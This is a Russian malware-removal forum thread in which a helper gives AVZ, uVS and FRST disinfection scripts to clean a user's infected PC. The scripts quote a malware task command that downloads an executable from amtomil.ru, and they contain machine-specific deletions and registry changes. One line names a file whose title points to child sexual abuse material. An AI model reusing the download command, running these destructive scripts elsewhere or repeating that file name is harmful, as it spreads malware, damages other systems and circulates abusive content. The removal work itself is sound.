Здравствуйте. Компьютер тормозит, сканирую CureIt, находит 9 троянов, но не может обезвредить угрозы. В безопасном режиме тоже самое. Помогите.
CureIt не лечит найденные вирусы. [not-a-virus:HEUR:AdWare.Win32.Generic, Trojan.Win32.Agent.neszij
]
Здравствуйте. Компьютер тормозит, сканирую CureIt, находит 9 троянов, но не может обезвредить угрозы. В безопасном режиме тоже самое. Помогите.
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
Уважаемый(ая) Tulio, спасибо за обращение на наш форум!
Удаление вирусов - абсолютно бесплатная услуга на VirusInfo.Info. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.
Информация
Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.
Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.
За сутки даже лог ни кто не посмотрел
Сделал сканирование и чистку AdwCleaner, логи во вложении. Проблема с загрузкой процессора не исчезла. Грузит процесс svchost.exe.exe порядка 50% загрузки.
Последний раз редактировалось Tulio; 24.08.2017 в 18:23. Причина: Логи
Выполните скрипт в AVZ:Компьютер перезагрузится.Код:begin TerminateProcessByName('c:\windows\microsoft\svchost.exe'); TerminateProcessByName('C:\Windows\Microsoft\svchost.exe.exe'); TerminateProcessByName('c:\users\Александр и Ко\appdata\local\yc\application\yc.exe'); StopService('Ea3Host'); StopService('SvcHost Service Host'); QuarantineFile('c:\windows\microsoft\svchost.exe', ''); QuarantineFile('C:\Windows\Microsoft\svchost.exe.exe', ''); QuarantineFile('c:\users\Александр и Ко\appdata\local\yc\application\yc.exe', ''); QuarantineFile('C:\Users\Александр и Ко\AppData\Local\yc\Application\59.0.3071.115\chrome_elf.dll', ''); QuarantineFile('C:\Users\Александр и Ко\AppData\Local\yc\Application\59.0.3071.115\chrome_child.dll', ''); QuarantineFile('C:\Users\Александр и Ко\AppData\Local\yc\Application\59.0.3071.115\libglesv2.dll', ''); QuarantineFile('C:\Users\Александр и Ко\AppData\Local\yc\Application\59.0.3071.115\libegl.dll', ''); QuarantineFile('C:\Users\Александр и Ко\AppData\Local\yc\Application\59.0.3071.115\chrome.dll', ''); QuarantineFile('C:\Windows\system32\Ea3Host.exe', ''); QuarantineFile('C:\Windows\system32\GroupPolicy\Machine\Registry.pol', ''); QuarantineFile('C:\ProgramData\Microsoft\Adobe\Flash Player\FB433554-A7A6-4743-BB9D-987243A435E0\3B3AD1E9-23AF-4D20-B9F5-9A33EFFF78EB.exe', ''); QuarantineFile('C:\Users\04CA~1\AppData\Roaming\curl\curl_7_54.exe -f -L http://amtomil.ru/f.exe -o C:\Users\04CA~1\AppData\Roaming\curl\curl.exe', ''); QuarantineFile('C:\Users\04CA~1\AppData\Roaming\curl\curl_7_54.exe', ''); QuarantineFile('C:\Users\04CA~1\AppData\Roaming\curl\curl.exe', ''); QuarantineFile('C:\Users\Александр и Ко\AppData\Local\etdctrl\etdctrl.exe', ''); QuarantineFile('C:\Users\Александр и Ко\AppData\Roaming\Microsoft\msi.exe', ''); QuarantineFile('C:\Users\Александр и Ко\appdata\local\systemdir\nethost.exe', ''); QuarantineFile('C:\Users\Александр и Ко\appdata\roaming\curl\curl_7_54.exe', ''); QuarantineFile('C:\Users\Александр и Ко\appdata\roaming\windowsupdater\updater.exe', ''); DeleteFile('c:\windows\microsoft\svchost.exe', '32'); DeleteFile('C:\Windows\Microsoft\svchost.exe.exe', '32'); DeleteFile('c:\users\Александр и Ко\appdata\local\yc\application\yc.exe', '32'); DeleteFile('C:\Users\Александр и Ко\AppData\Local\yc\Application\59.0.3071.115\chrome_elf.dll', '32'); DeleteFile('C:\Users\Александр и Ко\AppData\Local\yc\Application\59.0.3071.115\chrome_child.dll', '32'); DeleteFile('C:\Users\Александр и Ко\AppData\Local\yc\Application\59.0.3071.115\libglesv2.dll', '32'); DeleteFile('C:\Users\Александр и Ко\AppData\Local\yc\Application\59.0.3071.115\libegl.dll', '32'); DeleteFile('C:\Users\Александр и Ко\AppData\Local\yc\Application\59.0.3071.115\chrome.dll', '32'); DeleteFile('C:\Windows\system32\Ea3Host.exe', '32'); DeleteFile('C:\Windows\system32\GroupPolicy\Machine\Registry.pol', '32'); DeleteFile('C:\ProgramData\Microsoft\Adobe\Flash Player\FB433554-A7A6-4743-BB9D-987243A435E0\3B3AD1E9-23AF-4D20-B9F5-9A33EFFF78EB.exe', '32'); DeleteFile('C:\Users\04CA~1\AppData\Roaming\curl\curl_7_54.exe', '32'); DeleteFile('C:\Users\04CA~1\AppData\Roaming\curl\curl.exe', '32'); DeleteFile('C:\Users\Александр и Ко\AppData\Local\Microsoft\Start Menu\Вoйти в Интeрнeт.lnk', '32'); DeleteFile('C:\Users\Александр и Ко\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Вoйти в Интeрнeт.lnk', '32'); DeleteFile('C:\Users\Александр и Ко\Favorites\Links\Интернет.url', '32'); DeleteFile('C:\Users\Александр и Ко\AppData\Local\etdctrl\etdctrl.exe', '32'); DeleteFile('C:\Users\Александр и Ко\AppData\Roaming\Microsoft\msi.exe', '32'); DeleteFile('C:\Users\Александр и Ко\appdata\local\systemdir\nethost.exe', '32'); DeleteFile('C:\Users\Александр и Ко\appdata\roaming\curl\curl_7_54.exe', '32'); DeleteFile('C:\Users\Александр и Ко\appdata\roaming\windowsupdater\updater.exe', '32'); DeleteService('Ea3Host'); DeleteService('SvcHost Service Host'); DeleteFileMask('c:\users\александр и ко\appdata\local\yc', '*', true); DeleteFileMask('c:\users\04ca~1\appdata\roaming\curl', '*', true); DeleteFileMask('c:\users\александр и ко\appdata\local\etdctrl', '*', true); DeleteFileMask('c:\users\александр и ко\appdata\local\systemdir', '*', true); DeleteFileMask('c:\users\александр и ко\appdata\roaming\curl', '*', true); DeleteFileMask('c:\users\александр и ко\appdata\roaming\windowsupdater', '*', true); DeleteDirectory('c:\users\александр и ко\appdata\local\yc'); DeleteDirectory('c:\users\04ca~1\appdata\roaming\curl'); DeleteDirectory('c:\users\александр и ко\appdata\local\systemdir'); DeleteDirectory('c:\users\александр и ко\appdata\roaming\curl'); DeleteDirectory('c:\users\александр и ко\appdata\roaming\windowsupdater'); ExecuteFile('schtasks.exe', '/delete /TN "curl" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "curls" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "etdctrl" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "MSI" /F', 0, 15000, true); ExecuteFile('ipconfig.exe', '/flushdns', 0, 15000, true); RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'C'); RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'FB433554-A7A6-4743-BB9D-987243A435E0'); RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'ntbqumoxdt'); RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'ycAutoLaunch_185FADED47DCEBAE627D22511F053EEF'); RegKeyParamDel('HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run', 'FB433554-A7A6-4743-BB9D-987243A435E0'); RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1201', 3); RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1001', 1); RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1004', 3); RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '2201', 3); RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1804', 1); CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip'); ExecuteSysClean; ExecuteRepair(21); ExecuteWizard('SCU', 2, 2, true); RebootWindows(true); end.
В папке с AVZ появится архив карантина quarantine.zip, отправьте этот файл по ссылке "Прислать запрошенный карантин" над над первым сообщением в теме.
Перетащите лог Check_Browsers_LNK.log из папки Autologger на утилиту ClearLNK. Отчёт о работе прикрепите.
Сделайте новый лог Autologger.
Сделайте лог Malwarebytes AdwCleaner.
WBR,
Vadim
Сделано!
Похоже svchost.exe.exe исчез, остался в разгоне до 25% IAStorDataMgrSvc.exe - с ним надо что то делать? Готов к дальнейшим действиям, спасибо!
Что-то особой разницы с исходными логами мало, всё на месте. Вы такую паузу не выдерживайте, иначе до НГ лечить будем.
Выполните скрипт в AVZ:В папке с AVZ появится архив карантина quarantine.zip, отправьте этот файл по ссылке "Прислать запрошенный карантин" над над первым сообщением в теме.Код:begin ClearQuarantine; TerminateProcessByName('c:\windows\microsoft\svchost.exe'); TerminateProcessByName('C:\Windows\Microsoft\svchost.exe.exe'); TerminateProcessByName('c:\users\Александр и Ко\appdata\local\yc\application\yc.exe'); StopService('Ea3Host'); StopService('SvcHost Service Host'); QuarantineFile('c:\windows\microsoft\svchost.exe', ''); QuarantineFile('C:\Windows\Microsoft\svchost.exe.exe', ''); QuarantineFile('C:\Windows\system32\Ea3Host.exe', ''); QuarantineFile('C:\Windows\system32\GroupPolicy\Machine\Registry.pol', ''); QuarantineFile('C:\ProgramData\Microsoft\Adobe\Flash Player\FB433554-A7A6-4743-BB9D-987243A435E0\3B3AD1E9-23AF-4D20-B9F5-9A33EFFF78EB.exe', ''); QuarantineFile('C:\Users\04CA~1\AppData\Roaming\curl\curl_7_54.exe -f -L http://amtomil.ru/f.exe -o C:\Users\04CA~1\AppData\Roaming\curl\curl.exe', ''); QuarantineFile('C:\Users\04CA~1\AppData\Roaming\curl\curl_7_54.exe', ''); QuarantineFile('C:\Users\04CA~1\AppData\Roaming\curl\curl.exe', ''); QuarantineFile('C:\Users\Александр и Ко\AppData\Local\etdctrl\etdctrl.exe', ''); QuarantineFile('C:\Users\Александр и Ко\AppData\Roaming\Microsoft\msi.exe', ''); QuarantineFile('C:\Users\Александр и Ко\appdata\local\systemdir\nethost.exe', ''); QuarantineFile('C:\Users\Александр и Ко\appdata\roaming\curl\curl_7_54.exe', ''); QuarantineFile('C:\Users\Александр и Ко\appdata\roaming\windowsupdater\updater.exe', ''); DeleteFile('c:\windows\microsoft\svchost.exe', '32'); DeleteFile('C:\Windows\Microsoft\svchost.exe.exe', '32'); DeleteFile('c:\users\Александр и Ко\appdata\local\yc\application\yc.exe', '32'); DeleteFile('C:\Users\Александр и Ко\AppData\Local\yc\Application\59.0.3071.115\chrome_elf.dll', '32'); DeleteFile('C:\Users\Александр и Ко\AppData\Local\yc\Application\59.0.3071.115\chrome_child.dll', '32'); DeleteFile('C:\Users\Александр и Ко\AppData\Local\yc\Application\59.0.3071.115\chrome.dll', '32'); DeleteFile('C:\Users\Александр и Ко\AppData\Local\yc\Application\59.0.3071.115\libglesv2.dll', '32'); DeleteFile('C:\Users\Александр и Ко\AppData\Local\yc\Application\59.0.3071.115\libegl.dll', '32'); DeleteFile('C:\Windows\system32\Ea3Host.exe', '32'); DeleteFile('C:\Windows\system32\GroupPolicy\Machine\Registry.pol', '32'); DeleteFile('C:\ProgramData\Microsoft\Adobe\Flash Player\FB433554-A7A6-4743-BB9D-987243A435E0\3B3AD1E9-23AF-4D20-B9F5-9A33EFFF78EB.exe', '32'); DeleteFile('C:\Users\04CA~1\AppData\Roaming\curl\curl_7_54.exe -f -L http://amtomil.ru/f.exe -o C:\Users\04CA~1\AppData\Roaming\curl\curl.exe', '32'); DeleteFile('C:\Users\04CA~1\AppData\Roaming\curl\curl_7_54.exe', '32'); DeleteFile('C:\Users\04CA~1\AppData\Roaming\curl\curl.exe', '32'); DeleteFile('C:\Users\Александр и Ко\AppData\Local\etdctrl\etdctrl.exe', '32'); DeleteFile('C:\Users\Александр и Ко\AppData\Roaming\Microsoft\msi.exe', '32'); DeleteFile('C:\Users\Александр и Ко\appdata\local\systemdir\nethost.exe', '32'); DeleteFile('C:\Users\Александр и Ко\appdata\roaming\curl\curl_7_54.exe', '32'); DeleteFile('C:\Users\Александр и Ко\appdata\roaming\windowsupdater\updater.exe', '32'); DeleteService('Ea3Host'); DeleteService('SvcHost Service Host'); DeleteFileMask('c:\users\александр и ко\appdata\local\yc', '*', true); DeleteFileMask('c:\users\04ca~1\appdata\roaming\curl', '*', true); DeleteFileMask('c:\users\александр и ко\appdata\local\etdctrl', '*', true); DeleteFileMask('c:\users\александр и ко\appdata\local\systemdir', '*', true); DeleteFileMask('c:\users\александр и ко\appdata\roaming\curl', '*', true); DeleteFileMask('c:\users\александр и ко\appdata\roaming\windowsupdater', '*', true); DeleteDirectory('c:\users\александр и ко\appdata\local\yc'); DeleteDirectory('c:\users\04ca~1\appdata\roaming\curl'); DeleteDirectory('c:\users\александр и ко\appdata\local\systemdir'); DeleteDirectory('c:\users\александр и ко\appdata\roaming\curl'); DeleteDirectory('c:\users\александр и ко\appdata\roaming\windowsupdater'); ExecuteFile('schtasks.exe', '/delete /TN "curl" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "curls" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "etdctrl" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "MSI" /F', 0, 15000, true); RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'C'); RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'FB433554-A7A6-4743-BB9D-987243A435E0'); RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'ntbqumoxdt'); RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'ycAutoLaunch_185FADED47DCEBAE627D22511F053EEF'); RegKeyParamDel('HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run', 'FB433554-A7A6-4743-BB9D-987243A435E0'); RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1201', 3); RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1001', 1); RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1004', 3); RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '2201', 3); RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1804', 1); CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip'); ExecuteSysClean; ExecuteRepair(21); ExecuteFile('ipconfig.exe', '/flushdns', 0, 15000, true); RebootWindows(true); end.
Скачайте утилиту Universal Virus Sniffer отсюда и сделайте полный образ автозапуска uVS.
WBR,
Vadim
Отдыхал в тёплых краях, теперь буду оперативным.Сообщение от Vvvyg
- - - - -Добавлено - - - - -
Как удалить лишние файлы в менеджере вложений? Не могу прикрепить лог uVS из-за превышения лимита, он 770кб весит в архиве.
Загрузите его в доступное облачное хранилище или на файлообменник (rghost.ru, например) и дайте ссылку в теме.
WBR,
Vadim
Так подойдёт? https://yadi.sk/d/3KOkPMAv3MdXV3
Вполне.
Скопируйте скрипт ниже в буфер обмена (выделить и нажать Ctrl-C):Запустите файл start.exe из папки с uVS, выберите "Запустить под текущим пользователем", в главном меню программы - Скрипты -> выполнить скрипт из буфера обмена.Код:;uVS v4.0.10 [http://dsrt.dyndns.org] ;Target OS: NTv6.1 v400c OFFSGNSAVE ;------------------------autoscript--------------------------- cexec tools\CreateRestorePoint.exe BeforeCure zoo %Sys32%\EA3HOST.EXE addsgn B6653BBE7526C5362FCCE63830EC024DACC6D8FEC179F3003D9575B2509EF808073F82EE7E559D496A38848F4616F3EA5ADFE8419C25A5E92277A4674E42063B 8 Trojan.LoadMoney.2470 [DrWeb] 7 chklst delvir delref %SystemDrive%\USERS\��������� � ��\APPDATA\ROAMING\421RL31GSNMGLRPGJWGCKY.EXE delref %SystemDrive%\USERS\��������� � ��\APPDATA\ROAMING\DEFW7RWUTKSKBBBIEOVKN.EXE delref %SystemDrive%\USERS\��������� � ��\APPDATA\ROAMING\HC3GC2WOVMEA75N7MALUIQN.EXE delref %SystemDrive%\USERS\��������� � ��\APPDATA\ROAMING\LHCXGD2TFZVC9VO.EXE delref %SystemDrive%\USERS\��������� � ��\APPDATA\ROAMING\LUMNBZPS6FFZMGGL.EXE delref %SystemDrive%\USERS\��������� � ��\APPDATA\ROAMING\U4MCYRLX2OCBO4PR8IU.EXE delref HTTP://CLIENTS2.GOOGLE.COM/SERVICE/UPDATE2/CRX?RESPONSE=REDIRECT&PRODVERSION=38.0&X=ID%3DCPEGCOPCFAJIIIBIDLAELHJJBLPEFBJK%26INSTALLSOURCE%3DONDEMAND%26UC delref HTTPS://CLIENTS2.GOOGLE.COM/SERVICE/UPDATE2/CRX?RESPONSE=REDIRECT&PRODVERSION=38.0&X=ID%3DNBIFDKMDOJGMPMOPDEBNJCOBEKGDONCN%26INSTALLSOURCE%3DONDEMAND%26UC delref HTTP://CLIENTS2.GOOGLE.COM/SERVICE/UPDATE2/CRX?RESPONSE=REDIRECT&PRODVERSION=38.0&X=ID%3DNECFMKPLPMINFJAGBLFABGGOMDPAAKAN%26INSTALLSOURCE%3DONDEMAND%26UC delref %SystemDrive%\USERS\АЛЕКСАНДР И КО\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\PROFILE 2\EXTENSIONS\BGBGNHMFBCIFPKJOFOOJFPLMFKMAIADN\11.0.25_0\ДОМАШНЯЯ СТРАНИЦА MAIL.RU delref %SystemDrive%\USERS\АЛЕКСАНДР И КО\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\PROFILE 2\EXTENSIONS\BHJHNAFPIILPFFHGLAJCAEPJBNBJEMCI\12.0.23_0\ПОИСК MAIL.RU delref %SystemDrive%\USERS\АЛЕКСАНДР И КО\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\PROFILE 2\EXTENSIONS\BPGANGMFFJCOFIKNIBCMFJIONICOHFGJ\4.0.5_0\ВИЗУАЛЬНЫЕ ЗАКЛАДКИ MAIL.RU delref %SystemDrive%\USERS\АЛЕКСАНДР И КО\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\PROFILE 2\EXTENSIONS\CPEGCOPCFAJIIIBIDLAELHJJBLPEFBJK\2.0.4.15_0\СТАРТОВАЯ — ЯНДЕКС delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\CHROME\APPLICATION\45.0.2454.101\RESOURCES\BOOKMARK_MANAGER\BOOKMARK MANAGER delref %SystemDrive%\USERS\АЛЕКСАНДР И КО\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\PROFILE 2\EXTENSIONS\HCADGIJMEDBFGCIEGJOMFPJCDCHLHNIF\12.0.28_0\ДОМАШНЯЯ СТРАНИЦА MAIL.RU delref %SystemDrive%\USERS\АЛЕКСАНДР И КО\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\PROFILE 2\EXTENSIONS\NBIFDKMDOJGMPMOPDEBNJCOBEKGDONCN\4.0.25_0\ПОИСК MAIL.RU delref %SystemDrive%\USERS\АЛЕКСАНДР И КО\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\PROFILE 2\EXTENSIONS\NECFMKPLPMINFJAGBLFABGGOMDPAAKAN\2.0.3.15_0\ПОИСК ЯНДЕКСA delref %SystemDrive%\USERS\АЛЕКСАНДР И КО\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\PROFILE 2\EXTENSIONS\NMMHKKEGCCAGDLDGIIMEDPICCMGMIEDA\1.0.0.3_0\ПЛАТЕЖНАЯ СИСТЕМА ИНТЕРНЕТ-МАГАЗИНА CHROME apply regt 27 regt 28 regt 29 ;------------------------------------------------------------- deltmp ;---------command-block--------- delref %SystemDrive%\USERS\АЛЕКСАНДР И КО\APPDATA\ROAMING\MICROSOFT\MSI.EXE del %SystemDrive%\USERS\АЛЕКСАНДР И КО\DOWNLOADS\ADWCLEANER_4.000.EXE del %SystemDrive%\USERS\АЛЕКСАНДР И КО\DOWNLOADS\ADWCLEANER_4.002.EXE delref D:\PROGRAM FILES (X86)\INTERNET EXPLORER\IEXPLORE.EXE delref НОВАЯ ПАПКА\PTHC_LOLIFUCK_10YO_KATRINA_-_DOGGYSTYLECP_EEB-E49___.EXE delref %SystemDrive%\PROGRAM FILES (X86)\QYERBVXRHIE\KQYPTFIFME.EXE apply czoo restart
Компьютер перезагрузится.
В папке с uVS появится архив ZIP с именем, начинающимся с ZOO_ и далее из даты и времени, отправьте этот файл по ссылке "Прислать запрошенный карантин" над над первым сообщением в теме.
В папке с UVS будет лог выполнения скрипта, текстовый файл с именем из даты и времени выполнения, прикрепите его с своему сообщению.
Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.
Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
Прикрепите эти файлы к своему следующему сообщению (лучше все в одном архиве).
- - - - -Добавлено - - - - -
Удалите вложения, относящиеся к самым старым темам.
WBR,
Vadim
Готово. Архив из uvs пришлось дополнительно запаковать в zip, иначе не отправлялось.
Так Вы не по моей ссылке UVS скачали, там версия, которая как надо карантин пакует, и более новая, кстати.
Откройте Блокнот (Старт =>Программы => Стандартные => Блокнот). Скопируйте в него следующий код:и сохраните как fixlist.txt в папку с Farbar Recovery Scan ToolКод:CreateRestorePoint: GroupPolicy: Restriction - Chrome <==== ATTENTION CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION SearchScopes: HKU\S-1-5-21-1785463621-1497758277-2574744706-1000 -> DefaultScope {FFEBBF0A-C22C-4172-89FF-45215A135AC7} URL = hxxp://go.mail.ru/search?q={SearchTerms}&fr=iextn&gp=blackbear1 SearchScopes: HKU\S-1-5-21-1785463621-1497758277-2574744706-1000 -> {FFEBBF0A-C22C-4172-89FF-45215A135AC7} URL = hxxp://go.mail.ru/search?q={SearchTerms}&fr=iextn&gp=blackbear1 FF DefaultSearchEngine: Mozilla\Firefox\Profiles\shvrsae5.default -> Поиск@Mail.Ru FF SelectedSearchEngine: Mozilla\Firefox\Profiles\shvrsae5.default -> Поиск@Mail.Ru FF Homepage: Mozilla\Firefox\Profiles\shvrsae5.default -> hxxp://mail.ru/cnt/10445?gp=811013 FF Keyword.URL: Mozilla\Firefox\Profiles\shvrsae5.default -> hxxp://go.mail.ru/distib/ep/?fr=ntg&product_id=%7BCD63AC64-B0D3-45E0-A4BA-4CDA2B1E9F7D%7D&gp=811014 CHR HomePage: Profile 2 -> mail.ru CHR StartupUrls: Profile 2 -> "hxxp://mail.ru/cnt/10445?gp=811009" CHR NewTab: Profile 2 -> Active:"chrome-extension://bpgangmffjcofiknibcmfjionicohfgj/visual-bookmarks.html" CHR DefaultSearchURL: Profile 2 -> hxxp://go.mail.ru/distib/ep/?q={searchTerms}&fr=ntg&product_id=%7BAC228B10-87AF-428B-B6A6-6A9B799812F4%7D&gp=811010 CHR DefaultSearchKeyword: Profile 2 -> go.mail.ru CHR DefaultSuggestURL: Profile 2 -> hxxp://suggests.go.mail.ru/ff3?q={searchTerms} CHR Profile: C:\Users\Александр и Ко\AppData\Local\Google\Chrome\User Data\System Profile [2017-08-22] CHR HKLM-x32\...\Chrome\Extension: [bgbgnhmfbcifpkjofoojfplmfkmaiadn] - hxxps://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [bhjhnafpiilpffhglajcaepjbnbjemci] - hxxps://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [bpgangmffjcofiknibcmfjionicohfgj] - hxxps://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [hcadgijmedbfgciegjomfpjcdchlhnif] - hxxps://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [hocdkcedpfejgmnoaheingaleckdlffn] - C:\ProgramData\Bcool\hocdkcedpfejgmnoaheingaleckdlffn.crx <not found> CHR HKLM-x32\...\Chrome\Extension: [iifchhfnnmpdbibifmljnfjhpififfog] - hxxps://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [indjgiebmakhmnaplnlnanodkfiejfjd] - hxxps://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [jkfblcbjfojmgagikhldeppgmgdpjkpl] - hxxp://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [kedfcojchlkbbjodianmnimklobmaaik] - C:\ProgramData\ADDICT-THING\kedfcojchlkbbjodianmnimklobmaaik.crx <not found> 2015-04-19 19:20 - 2015-04-19 19:20 - 000005872 _____ () C:\Users\Александр и Ко\AppData\Roaming\421RL31gSnMGlrpgjwGCkY 2015-04-20 21:05 - 2015-04-20 21:05 - 001579520 _____ () C:\Users\Александр и Ко\AppData\Roaming\421RL31gSnMGlrpgjwGCkY.exe 2015-04-14 23:28 - 2015-04-14 23:28 - 000004387 _____ () C:\Users\Александр и Ко\AppData\Roaming\defw7rwuTKSkbBBIEoVkn 2015-04-20 21:05 - 2015-04-20 21:05 - 001246720 _____ () C:\Users\Александр и Ко\AppData\Roaming\defw7rwuTKSkbBBIEoVkn.exe 2015-04-19 19:20 - 2015-04-19 19:20 - 000005872 _____ () C:\Users\Александр и Ко\AppData\Roaming\hC3gC2wOvMEA75n7MALuIQn 2015-04-20 21:05 - 2015-04-20 21:05 - 001579520 _____ () C:\Users\Александр и Ко\AppData\Roaming\hC3gC2wOvMEA75n7MALuIQn.exe 2015-04-14 23:28 - 2015-04-14 23:28 - 000004387 _____ () C:\Users\Александр и Ко\AppData\Roaming\LhCxgD2tFzvC9Vo 2015-04-20 21:05 - 2015-04-20 21:05 - 001246720 _____ () C:\Users\Александр и Ко\AppData\Roaming\LhCxgD2tFzvC9Vo.exe 2015-04-14 23:28 - 2015-04-14 23:28 - 000004387 _____ () C:\Users\Александр и Ко\AppData\Roaming\lumnBZpS6FfzMgGL 2015-04-20 21:05 - 2015-04-20 21:05 - 001246720 _____ () C:\Users\Александр и Ко\AppData\Roaming\lumnBZpS6FfzMgGL.exe 2012-05-09 19:22 - 2012-05-09 19:22 - 000393368 _____ (Media Labs Ltd.) C:\Users\Александр и Ко\AppData\Roaming\TicnoBar.ins 2015-04-19 19:20 - 2015-04-19 19:20 - 000005872 _____ () C:\Users\Александр и Ко\AppData\Roaming\U4mcYrLX2ocbO4Pr8Iu 2015-04-20 21:05 - 2015-04-20 21:05 - 001579520 _____ () C:\Users\Александр и Ко\AppData\Roaming\U4mcYrLX2ocbO4Pr8Iu.exe 2015-10-07 12:00 - 2015-10-07 12:00 - 000613255 _____ (CMI Limited) C:\Users\Александр и Ко\AppData\Local\nsi7B.tmp 2015-10-07 11:21 - 2015-10-07 11:21 - 000613255 _____ (CMI Limited) C:\Users\Александр и Ко\AppData\Local\nsj6C4E.tmp 2015-10-07 14:26 - 2015-10-07 14:26 - 000613255 _____ (CMI Limited) C:\Users\Александр и Ко\AppData\Local\nsnBB1C.tmp ContextMenuHandlers1: [Glary Utilities] -> [CC]{B3C418F8-922B-4faf-915E-59BC14448CF7} => -> No File ContextMenuHandlers2: [Glary Utilities] -> [CC]{B3C418F8-922B-4faf-915E-59BC14448CF7} => -> No File ContextMenuHandlers6: [Glary Utilities] -> [CC]{B3C418F8-922B-4faf-915E-59BC14448CF7} => -> No File Task: {C60C9AFB-525D-453C-83F6-09F622CE6E6D} - \MSI -> No File <==== ATTENTION AlternateDataStreams: C:\ProgramData\Temp:7717F034 [120] AlternateDataStreams: C:\ProgramData\Temp:D1B5B4F1 [112] MSCONFIG\startupreg: GUDelayStartup => "C:\Program Files (x86)\Glary Utilities 5\StartupManager.exe" -delayrun FirewallRules: [{D41216BA-86E4-4073-8A1F-3A2A17A8C576}] => (Allow) C:\Users\Александр и Ко\AppData\Local\yc\Application\yc.exe Reboot:
Отключите до перезагрузки антивирус, закройте все браузеры, в FRST нажмите один раз Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен автоматически.
Сообщите, что с проблемой.
WBR,
Vadim
Сделал. Тормозов стало меньше. В процессах только 20-25% IAStorDataMgrSvc.exe
WBR,
Vadim
Спасибо за помощь!
Удалите папку C:\FRST со всем содержимым.
Выполните рекомендации после лечения.
Статистика проведенного лечения:
- Получено карантинов: 3
- Обработано файлов: 11
- В ходе лечения обнаружены вредоносные программы:
- c:\programdata\microsoft\adobe\flash player\fb433554-a7a6-4743-bb9d-987243a435e0\3b3ad1e9-23af-4d20-b9f5-9a33efff78eb.exe - UDS:DangerousObject.Multi.Generic
- c:\users\александр и ко\appdata\local\systemdir\nethost.exe - Trojan.Win32.Agent.neszij ( DrWEB: Trojan.LoadMoney.1094, AVAST4: Win32:Dropper-gen [Drp] )
